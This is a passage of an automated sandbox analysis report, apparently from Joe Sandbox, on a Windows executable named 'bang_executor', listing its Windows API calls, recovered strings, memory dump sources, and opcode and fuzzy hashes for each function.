                                        • Opcode Fuzzy Hash: 599c60d69ba2d18dcfe3dc5b6b1610f79c6c09fff80cb458eee22822d03ecd8f
                                        • Instruction Fuzzy Hash: 6CD0C971388340BBFA110B614C0AF6B779DAB69BA2F24C805B755E80E0D6749429B62D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0051403F,?,?,00000008,?,?,00513CDF,00000000), ref: 00514271
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 175fe22884e89c50eb2d5af255b601c627bb7582132700a6a96d54fb7d5bc8d9
                                        • Instruction ID: 9e19ee56df7293145b9da7f270fb544505c296fde015d83b0bfbb454e68cc3d9
                                        • Opcode Fuzzy Hash: 175fe22884e89c50eb2d5af255b601c627bb7582132700a6a96d54fb7d5bc8d9
                                        • Instruction Fuzzy Hash: 68B13A356106099FE715CF28C48ABA57FA0FF45365F258658E8A9CF2A1C335E9D2CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 004ED0A7
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 3b73fa4ff1e94e369453545f533dd05e4b66249c0986b962b962a2a61f478aa4
                                        • Instruction ID: 3dbec2db7449407f85328165568b7c344f8209650677d06a8804989ab111124c
                                        • Opcode Fuzzy Hash: 3b73fa4ff1e94e369453545f533dd05e4b66249c0986b962b962a2a61f478aa4
                                        • Instruction Fuzzy Hash: 55014F74900608CFDB24CF24EC49A9D77B1FF69314F204219D91697391E734A50EDF45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 00caab01f3be782c5a8ca22f434476edc65adc9a37accb52b3af80efc131f376
                                        • Instruction ID: 891f63e6e30e69506cdcb13e59decfa3d17db1817791e40c5060112fcec3e8c6
                                        • Opcode Fuzzy Hash: 00caab01f3be782c5a8ca22f434476edc65adc9a37accb52b3af80efc131f376
                                        • Instruction Fuzzy Hash: A8D127B2A083458FC754CF2AD88065AFBE1FFC9308F59492EE998D7301D734A955CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00022170,00501BC5), ref: 00502162
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: d310b2f9f42b76e36e67320d8596b3e82888a666a72fe5958c970ec5d1443b21
                                        • Instruction ID: c184dded0325369ac452a97fce203f293349c8310752b6cb341ebbfb9bc3c6fd
                                        • Opcode Fuzzy Hash: d310b2f9f42b76e36e67320d8596b3e82888a666a72fe5958c970ec5d1443b21
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 934ccf0cd4b67d897cb7c2438ec395f92651c0feaeced376863ec7c5dca47e2e
                                        • Instruction ID: 339d8e118cba9f6e0569eac9842d563d39c893e6fed15ad18cd07b15d319b9c5
                                        • Opcode Fuzzy Hash: 934ccf0cd4b67d897cb7c2438ec395f92651c0feaeced376863ec7c5dca47e2e
                                        • Instruction Fuzzy Hash: 0411607190470A9BD768DF59894576BF7E4FB00304F10C92FD2A6E2280C3B8A540CB05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: c533087dd0ffbde2ebef9dd7f8ef9ff04bffa44157086eaa78d3d37b4bc7e548
                                        • Instruction ID: be551d81d159dad7ce18fc91f5564ac1f4f94cb299316ceb1b1130ddd93b8d19
                                        • Opcode Fuzzy Hash: c533087dd0ffbde2ebef9dd7f8ef9ff04bffa44157086eaa78d3d37b4bc7e548
                                        • Instruction Fuzzy Hash: E2A012701002009B83004F3259043883994E513184300C0155005C0220D6254014AF01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90c3c98ec23a744960941777bc03b1281d3b488c6a7f7634cefa33c0df39adee
                                        • Instruction ID: f8df8a799649baefdc9a75dab5b9f206daae2c007b0e5ea2e85e0de473ea1f73
                                        • Opcode Fuzzy Hash: 90c3c98ec23a744960941777bc03b1281d3b488c6a7f7634cefa33c0df39adee
                                        • Instruction Fuzzy Hash: CB623B316047898FCB29CF38C8906BA7BE1AF95304F18855FDA9B8F342DB38A945C715
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e008b3fe25645c420bb524d8f5ec445355e06715b0fa383b64c6e5b3b3f0fe45
                                        • Instruction ID: 16ae283b0bb9cf022489c795943b8a7716e3c4f6654fee9e8de44ea7a6a88a80
                                        • Opcode Fuzzy Hash: e008b3fe25645c420bb524d8f5ec445355e06715b0fa383b64c6e5b3b3f0fe45
                                        • Instruction Fuzzy Hash: C66239716083899FCB18DF28C5906B9BBE1BF85304F08816EED998B346D738ED45CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b613aa6936206879556b4b98a40ab473639d5810861dad884f2e1ee316ea20b
                                        • Instruction ID: 7ad83c4169db3baa391fd6a9d51b633276c697af7f1572790a949292cecba69f
                                        • Opcode Fuzzy Hash: 7b613aa6936206879556b4b98a40ab473639d5810861dad884f2e1ee316ea20b
                                        • Instruction Fuzzy Hash: 62525A726087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D734EA19CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e5176716bdf17c859044e2bd954c436fb629172f6deec5d78228e269f76729b
                                        • Instruction ID: 0fb63e7a8e068055b2db44cf793dc63cdb266bdfa910e8fe203cbb61f077bb87
                                        • Opcode Fuzzy Hash: 1e5176716bdf17c859044e2bd954c436fb629172f6deec5d78228e269f76729b
                                        • Instruction Fuzzy Hash: 6512E47160470A9FD728CF28C5907B9B7E0FB59308F10892FEA97C7680D378A995CB49
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb0fbfd5b7427766d505987a6ef212b5a7e779de2dbbd00876df02a50681dd87
                                        • Instruction ID: a25f93e468c6587dcbcdbf24cb58a894acd1dfe1f359dee34831db9888694f8c
                                        • Opcode Fuzzy Hash: bb0fbfd5b7427766d505987a6ef212b5a7e779de2dbbd00876df02a50681dd87
                                        • Instruction Fuzzy Hash: 67F19971A083918FC718DF2AC584A2ABBE5FF99305F144A2EE4C5D7352D738E905CB4A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6eda43a95c1c2f1825c8bdbbc01ba5bb96ca6448e15225cf5c8fcafe88848279
                                        • Instruction ID: 72074199c6c25d289a11758c8d297d725bbba872bfe6b5440188b70676e0dafd
                                        • Opcode Fuzzy Hash: 6eda43a95c1c2f1825c8bdbbc01ba5bb96ca6448e15225cf5c8fcafe88848279
                                        • Instruction Fuzzy Hash: 00E15A745183958FC314CF29D49082BBBF0BFAA300F46095EF9D497352D234EA5ADBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 080d2b6761db61e46b019b21103b120f8970813ee5a797b6b743ce0b2c1cdfdd
                                        • Instruction ID: cc56ad7aa477f5ce02a0e27307d3a8755e78c9402a09dd365eba22705b1bd8b5
                                        • Opcode Fuzzy Hash: 080d2b6761db61e46b019b21103b120f8970813ee5a797b6b743ce0b2c1cdfdd
                                        • Instruction Fuzzy Hash: 109154B020074D8BDB24EF75D991BBB7795AB90308F11082FEB9687382DA7C9505C75A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44c8a7837ba84787dc7f2519c9374f56e2ac86870b0fbf95f58b9e70adfd8c0c
                                        • Instruction ID: 97e3be851d60f6ee3b0689c4c651101c4aa2aace42d8614b53fa547d91440397
                                        • Opcode Fuzzy Hash: 44c8a7837ba84787dc7f2519c9374f56e2ac86870b0fbf95f58b9e70adfd8c0c
                                        • Instruction Fuzzy Hash: B8813E717043495BEB24EE29C5C17BE77D59B95308F01083FEB86CB382DA689885875E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfbbbf000fc6126a3a720e2c8d204c6b541ec561fd01c7073ef32f6ebf56af52
                                        • Instruction ID: 27721ebd6ce68c07630e03d797abe1de3ea044f3fcb54c1844ba8b40d2d479ee
                                        • Opcode Fuzzy Hash: dfbbbf000fc6126a3a720e2c8d204c6b541ec561fd01c7073ef32f6ebf56af52
                                        • Instruction Fuzzy Hash: CE613B71F4C60E66DE345A28885ABBE7F94FB4D704F140D1AE983DB2C2E511BE42C355
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                        • Instruction ID: 007bb1bdded3cd7c1ad1e3fbf9a6413850e63ce3f253cbd566efbb95fd3a5480
                                        • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                        • Instruction Fuzzy Hash: F0515671E0C60E56EB384968855EBBE2F85FF5D380F184D09D982DB2C2D605FD06C3A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfbd3c0747b9ad007107f5f03d73e46f79d42f1bc5cfc0b2e807b70722fa8b34
                                        • Instruction ID: 96263cf4bda051787934f04ed72db09d09b330f5f300dbf983a5ecd3cebb65eb
                                        • Opcode Fuzzy Hash: dfbd3c0747b9ad007107f5f03d73e46f79d42f1bc5cfc0b2e807b70722fa8b34
                                        • Instruction Fuzzy Hash: 595145355083D98FC701CF39C58047FBFE0AE9A714F4A089EE6D94B252D231DA8ACB56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52f9ba8516b64880346e502abdccec4a69aa495762a1b4f3aab486678e535b6d
                                        • Instruction ID: 76825d48e272f37a71b1031b3876a9710628d295646a360d485d17e95e899fc7
                                        • Opcode Fuzzy Hash: 52f9ba8516b64880346e502abdccec4a69aa495762a1b4f3aab486678e535b6d
                                        • Instruction Fuzzy Hash: CD51E1B1A087159FC748CF19D98055AF7E1FF88314F058A2EE899E3340DB34E955CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                        • Instruction ID: 52c2cb8988d819f7c3609a69740167199567a53a3982bf70da6046769eacc280
                                        • Opcode Fuzzy Hash: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                        • Instruction Fuzzy Hash: EC3103B1614B099FC714DF29C89116FBBD0EB95305F10492EF595C7342C738E90ACB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _swprintf.LIBCMT ref: 004F0284
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                          • Part of subcall function 004F3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,004EF801,00000000,00000000,?,00525070,?,004EF801,?,?,00000050,?), ref: 004F3F64
                                        • _strlen.LIBCMT ref: 004F02A5
                                        • SetDlgItemTextW.USER32(?,00522274,?), ref: 004F02FE
                                        • GetWindowRect.USER32(?,?), ref: 004F0334
                                        • GetClientRect.USER32(?,?), ref: 004F0340
                                        • GetWindowLongW.USER32(?,000000F0), ref: 004F03EB
                                        • GetWindowRect.USER32(?,?), ref: 004F041B
                                        • SetWindowTextW.USER32(?,?), ref: 004F044A
                                        • GetSystemMetrics.USER32(00000008), ref: 004F0452
                                        • GetWindow.USER32(?,00000005), ref: 004F045D
                                        • GetWindowRect.USER32(00000000,?), ref: 004F048D
                                        • GetWindow.USER32(00000000,00000002), ref: 004F04FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d$t"R
                                        • API String ID: 2407758923-968809607
                                        • Opcode ID: 3ecd608ba91f0bcbf6c5efc77268e4b67939bcd23836c3da86cfbce60593f58f
                                        • Instruction ID: 97ba13efb54da6738507599344ac18b466bbdcc948a0c815ede7fee1b47e9c8d
                                        • Opcode Fuzzy Hash: 3ecd608ba91f0bcbf6c5efc77268e4b67939bcd23836c3da86cfbce60593f58f
                                        • Instruction Fuzzy Hash: 52818B72508345AFD714DF68CD89A6FBBE9EBC9708F00191EFA8493291D734E909CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0050F1B6
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050ED6E
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050ED80
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050ED92
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDA4
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDB6
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDC8
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDDA
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDEC
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EDFE
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE10
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE22
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE34
                                          • Part of subcall function 0050ED51: _free.LIBCMT ref: 0050EE46
                                        • _free.LIBCMT ref: 0050F1AB
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050F1CD
                                        • _free.LIBCMT ref: 0050F1E2
                                        • _free.LIBCMT ref: 0050F1ED
                                        • _free.LIBCMT ref: 0050F20F
                                        • _free.LIBCMT ref: 0050F222
                                        • _free.LIBCMT ref: 0050F230
                                        • _free.LIBCMT ref: 0050F23B
                                        • _free.LIBCMT ref: 0050F273
                                        • _free.LIBCMT ref: 0050F27A
                                        • _free.LIBCMT ref: 0050F297
                                        • _free.LIBCMT ref: 0050F2AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID: h)R
                                        • API String ID: 161543041-2024205497
                                        • Opcode ID: a357c582ea9cf768ff9e64168b49adfc7172a1963b013a00e467877816e20a65
                                        • Instruction ID: 44b63b0259de36732188e90a6fa1581b8fa28e46905a308bace3964e77590a64
                                        • Opcode Fuzzy Hash: a357c582ea9cf768ff9e64168b49adfc7172a1963b013a00e467877816e20a65
                                        • Instruction Fuzzy Hash: 3E311A35600607EFEB31EA69D88AB9E7BE9BF81310F244429E44AD65D1DF71AD81CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT ref: 004FB656
                                        • _wcslen.LIBCMT ref: 004FB6F6
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004FB705
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004FB726
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                        • String ID: FjuKP$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 1116704506-3796409688
                                        • Opcode ID: d12ee91b8fc05f5d4c55acb61783d06f4ab2525aceadcf9dc3c0a6d66f1bbc57
                                        • Instruction ID: e0ba14e9efea7d9e3bc225ea2a00a9aa46514a0fdc7dbc5d8cec4464023827d9
                                        • Opcode Fuzzy Hash: d12ee91b8fc05f5d4c55acb61783d06f4ab2525aceadcf9dc3c0a6d66f1bbc57
                                        • Instruction Fuzzy Hash: 5F31E83110831A7AE725AB34DC4AFBF7B9CEFD6310F14051EF501962D2FB68994582AA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 004FFA20
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 004FFA4C
                                          • Part of subcall function 004F4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,004EE084,00000000,.exe,?,?,00000800,?,?,?,004FAD5D), ref: 004F417E
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004FFA68
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004FFA7F
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004FFA93
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004FFABC
                                        • DeleteObject.GDI32(00000000), ref: 004FFAC3
                                        • GetWindow.USER32(00000000,00000002), ref: 004FFACC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: 8dfd24742852dbf13c60a8f75677e0593b9c5d6b5d74c8ba64a148feda2a1fd2
                                        • Instruction ID: ef1e2ce6b1ac00f56f202723e68f2b7e3e4f9d8835e6426a68b305572523d288
                                        • Opcode Fuzzy Hash: 8dfd24742852dbf13c60a8f75677e0593b9c5d6b5d74c8ba64a148feda2a1fd2
                                        • Instruction Fuzzy Hash: C3216D3694472C7BE620AB308C4AFFF369CAF5D704F000426FB45A6191DB78CD0996A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
